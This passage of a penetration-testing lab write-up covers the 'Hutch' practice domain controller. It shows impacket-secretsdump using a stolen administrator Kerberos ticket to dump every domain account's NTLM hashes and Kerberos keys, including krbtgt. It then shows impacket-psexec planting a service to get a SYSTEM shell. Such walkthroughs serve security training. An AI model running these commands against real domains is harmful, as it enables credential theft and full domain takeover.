DCSync

The TGT of the administrator user has been obtained.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ KRB5CCNAME=administrator@hutchdc.hutch.offsec.ccache impacket-secretsdump HUTCH.OFFSEC/@hutchdc.hutch.offsec -no-pass -k -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb24173e6ac9aa789ab05a4acceeb27ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bab179eba40e413086aa37742476c646:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HUTCH\HUTCHDC$:plain_password_hex:1b393595f43baefa886001e32894303c75f75006ab84ef233e025106c7d57dc9e0c24ab1c808d3a535cb2d2ed2ee4b0b2b61ec203447cecda73bb2bd5411b223fc2df36753a6297fd07d1c2635bffc662a986e1f7fae74d9644b5c91b85da5762ecb1e5428deda72cea479f3e9d52c3d2fe0071132067b65f3010c998f7495063888c8537d6bd689f7060bb6bf332f34ddd8cf50baad25f1187b89b31b9d4f9fea22e2de873c8dffdc9848b82249dfd15f5b5504b2ed26b8c1d3dfd8893c89548aa2c432aa353d8858306c7c9fc48f357c6c0f13c6f48eca60f72281970a5047b839767c59d0814ba88c659821cc275c
HUTCH\HUTCHDC$:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb818f6846ad0c5c47237a32eee5c2c30b0f739c0
dpapi_userkey:0x9c047d0b5fde15f60714f1411579b93a45dd5872
[*] NL$KM 
 0000   41 34 3F B6 A2 15 2F 99  E2 AA 6C 70 8C 5D 08 DA   A4?.../...lp.]..
 0010   C8 D0 7D ED 67 E9 35 73  A0 31 42 22 C5 A3 4C F2   ..}.g.5s.1B"..L.
 0020   CD C3 EE 84 3E 86 26 A0  EC 91 48 AB A1 62 85 19   ....>.&...H..b..
 0030   4F 37 C8 BC 78 4C 6A 54  36 63 95 0E 82 A0 72 57   O7..xLjT6c....rW
NL$KM:41343fb6a2152f99e2aa6c708c5d08dac8d07ded67e93573a0314222c5a34cf2cdc3ee843e8626a0ec9148aba16285194f37c8bc784c6a543663950e82a07257
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3247226bb126aed3663c935f2ab37c1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3c37d961d2fbbc1eb9e4d09f145ad361:::
hutch.offsec\rplacidi:1103:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\opatry:1104:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\ltaunton:1105:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\acostello:1106:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jsparwell:1107:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\oknee:1108:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jmckendry:1109:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\avictoria:1110:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jfrarey:1111:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\eaburrow:1112:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\cluddy:1113:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\agitthouse:1114:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\fmcsorley:1115:aad3b435b51404eeaad3b435b51404ee:83bcf188adc71adef071303fae29c1c7:::
hutch.offsec\domainadmin:1116:aad3b435b51404eeaad3b435b51404ee:8730fa0d1014eb78c61e3957aa7b93d7:::
HUTCHDC$:1000:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c091e4980477f3f9c4c2e3ad64a08d107c42158956a6301e7d037a66b9637e88
Administrator:aes128-cts-hmac-sha1-96:0152f1d86193a32f6bac28bf653d2e22
Administrator:des-cbc-md5:794054f2da5d34fd
krbtgt:aes256-cts-hmac-sha1-96:dc0de1944fc0218c5129c7b945f294be4940d5c4da9e632bc1c21c38a97974db
krbtgt:aes128-cts-hmac-sha1-96:927cd0e8ad96f8acfe8a76c15e2580d0
krbtgt:des-cbc-md5:023854fd2fd902dc
hutch.offsec\rplacidi:aes256-cts-hmac-sha1-96:7b5d40ea6108d29863a8079220b7b5142803a9c85d8c40ce65a73eed4fc71ab9
hutch.offsec\rplacidi:aes128-cts-hmac-sha1-96:ed21b067b78145b37eff06d98a4828ff
hutch.offsec\rplacidi:des-cbc-md5:980189853220f8a2
hutch.offsec\opatry:aes256-cts-hmac-sha1-96:f87867606af1558ed27996123d2d6393f0330626befe65647e8c179471f0c534
hutch.offsec\opatry:aes128-cts-hmac-sha1-96:c41a8a599028f21664c2bae013b29ecb
hutch.offsec\opatry:des-cbc-md5:f7e51cf1f29145ce
hutch.offsec\ltaunton:aes256-cts-hmac-sha1-96:b5cd286fd8c9666c1e3c4f712cdb1e26b5fd51ac2104dc760d8a7f34fb617e99
hutch.offsec\ltaunton:aes128-cts-hmac-sha1-96:1a43ab7395e1f22ccb879a16f3a1496a
hutch.offsec\ltaunton:des-cbc-md5:7cf1a70145b55d2a
hutch.offsec\acostello:aes256-cts-hmac-sha1-96:34a6712ba826709bfdf7a02e2481f06beff30b1b6f6951daed8f446ec34f8422
hutch.offsec\acostello:aes128-cts-hmac-sha1-96:be0dee1e08c5474b11855f7d06d3a278
hutch.offsec\acostello:des-cbc-md5:3df49e3ed0736bd3
hutch.offsec\jsparwell:aes256-cts-hmac-sha1-96:b4d7e452c10a4555a20fab086aaa36e0fa7cb8d5a8b23df97bddad63f96b6f1d
hutch.offsec\jsparwell:aes128-cts-hmac-sha1-96:f20475c4781be65c52870e18cb4b613c
hutch.offsec\jsparwell:des-cbc-md5:54982c2a51dcefe6
hutch.offsec\oknee:aes256-cts-hmac-sha1-96:6b9a4ba95463961e9d2dcb8b17da7aa350e4d482e33fc81cca053ca333824c47
hutch.offsec\oknee:aes128-cts-hmac-sha1-96:aefb6cafd75fcfaa2fd38a0e56c75eec
hutch.offsec\oknee:des-cbc-md5:ec7a25eae0e94f1c
hutch.offsec\jmckendry:aes256-cts-hmac-sha1-96:22ee68dab0d877d43ee2f138bebbf30707b1c42f79f3753c42d7839116bd8b30
hutch.offsec\jmckendry:aes128-cts-hmac-sha1-96:bef6b24600ce768f636f0a6937da0418
hutch.offsec\jmckendry:des-cbc-md5:58dc1a49f4a45ba4
hutch.offsec\avictoria:aes256-cts-hmac-sha1-96:44d8f8cbc4517741a4f96dabe7ca8ef63d4772a43d79b838e00db7d9cd9963b9
hutch.offsec\avictoria:aes128-cts-hmac-sha1-96:fecfaa6ee425efb4c0fd5c1ab92a444f
hutch.offsec\avictoria:des-cbc-md5:837f9461e5b0fb49
hutch.offsec\jfrarey:aes256-cts-hmac-sha1-96:d0c59d53e3b2fa543b8fa148d7f9f5a8e1c41b5380e23a117ecbbe8ab138f8e5
hutch.offsec\jfrarey:aes128-cts-hmac-sha1-96:7017ee9e695a4c82f2b890e16414abe0
hutch.offsec\jfrarey:des-cbc-md5:df161cf8fddac145
hutch.offsec\eaburrow:aes256-cts-hmac-sha1-96:7c20426d91c8cfa2c0f301bd09dc570c4b7d485c9143db3e7da15644295e327c
hutch.offsec\eaburrow:aes128-cts-hmac-sha1-96:08d33ff5aa4a66054fe4333180b886ba
hutch.offsec\eaburrow:des-cbc-md5:4ca20797cd94b5ad
hutch.offsec\cluddy:aes256-cts-hmac-sha1-96:9f8ccb9ba6b0c8aa8199e300122478d4526be75d67ecc96fdc5e4892f9fd9432
hutch.offsec\cluddy:aes128-cts-hmac-sha1-96:0813d6e021a6117cf35ee8a6c4bda70b
hutch.offsec\cluddy:des-cbc-md5:8a322f1ff404ad89
hutch.offsec\agitthouse:aes256-cts-hmac-sha1-96:ea5768347ddf42e949c4c61c821e1b01be47d4a53485b7a6d8fca9b708a6a5dc
hutch.offsec\agitthouse:aes128-cts-hmac-sha1-96:0887271ba1239c9755738a7ce13345ff
hutch.offsec\agitthouse:des-cbc-md5:3ba23b07ef6d3d7a
hutch.offsec\fmcsorley:aes256-cts-hmac-sha1-96:679828b1625b953fb96470e0712f3bfa7866ee99f260f289dff48a19cd80cc87
hutch.offsec\fmcsorley:aes128-cts-hmac-sha1-96:d12b8c1d7125196020760b917cc5d159
hutch.offsec\fmcsorley:des-cbc-md5:7a9b7cc4496104ab
hutch.offsec\domainadmin:aes256-cts-hmac-sha1-96:8d90904d735e652112c1947fdde2f0b1205d8df1944c286b1d24ec1187dae4aa
hutch.offsec\domainadmin:aes128-cts-hmac-sha1-96:29e412c68977461a3f4ead34c2886402
hutch.offsec\domainadmin:des-cbc-md5:bc10f7df49315dc7
HUTCHDC$:aes256-cts-hmac-sha1-96:986a2ea7bd0c20e0d2c5b5102d524d518e570ccc276eb3127b405bdf85a1e0d1
HUTCHDC$:aes128-cts-hmac-sha1-96:b32fce77ee3988aa0bef4b9bb89e5814
HUTCHDC$:des-cbc-md5:7fdff12091618094
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain level compromise

Shelldrop

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ KRB5CCNAME=administrator@hutchdc.hutch.offsec.ccache impacket-psexec HUTCH.OFFSEC/@hutchdc.hutch.offsec -no-pass -k -dc-ip $IP      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on hutchdc.hutch.offsec.....
[*] Found writable share ADMIN$
[*] Uploading file rVOrQqEi.exe
[*] Opening SVCManager on hutchdc.hutch.offsec.....
[*] Creating service mxMx on hutchdc.hutch.offsec.....
[*] Starting service mxMx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
hutchdc
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::9df9:8e58:4400:9b3a%3
   IPv4 Address. . . . . . . . . . . : 192.168.187.122
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.187.254

System level compromise

InfoSec LAB

Explorer

Hutch_Privilege_Escalation

DCSync

Shelldrop

Interactive Graph View

Table of Contents

Backlinks